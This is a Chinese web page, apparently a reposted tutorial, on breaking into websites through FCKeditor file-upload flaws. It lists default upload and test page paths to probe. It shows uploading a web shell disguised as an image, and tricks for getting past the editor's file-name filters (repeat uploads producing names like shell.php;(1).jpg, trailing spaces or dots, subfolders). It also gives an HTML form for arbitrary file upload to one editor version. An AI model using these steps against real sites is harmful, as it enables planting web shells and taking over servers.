编辑器上传漏洞 | 您所在的位置:网站首页 › UEditor编辑器任意文件上传漏洞分析 › 编辑器上传漏洞 |
突破fck上传漏洞详解fckeditor存在很多漏洞的 我把一些常见的上传漏洞给大家列出来下 /FCKeditor/_samples/default.html /fckeditor/_samples/default.html /fckeditor/editor/filemanager/browser/default/connectors/test.html /fckeditor/editor/filemanager/connectors/test.html /FCKeditor/editor/filemanager/connectors/uploadtest.html /FCKeditor/editor/filemanager/upload/test.html /fckeditor/editor/filemanager/browser/default/frmupload.html /fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.aspx /admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.aspx /admin/editor/editor/filemanager/upload/test.html /editor/editor/filemanager/upload/test.html 我们来测试下 这个上传页面被删除了 看下一个 呵呵 其实这些大部分都删除了 剩下这个/FCKeditor/editor/filemanager/connectors/uploadtest.html还在 测试下上传 这个是图片木马 /userfiles/ye4r_asp;1.jpg 看到没 它把ye4r.asp变成了ye4r_asp 那怎么办呢·· 解决方法就是再上传一次/userfiles/ye4r.asp;1(1).jpg
1.查看编辑器版本 FCKeditor/_whatsnew.html —————————————————————————————————————————————————————————————
2. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 —————————————————————————————————————————————————————————————
3.Version =2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。 form id="frmUpload" enctype="multipart/form-data" action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post"Upload a new file:br input type="file" name="NewFile" size="50"br input id="btnUpload" type="submit" value="Upload" /form —————————————————————————————————————————————————————————————
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。 4.1:提交shell.php+空格绕过 不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。 4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。 ——————————————————— |
CopyRight 2018-2019 实验室设备网 版权所有 |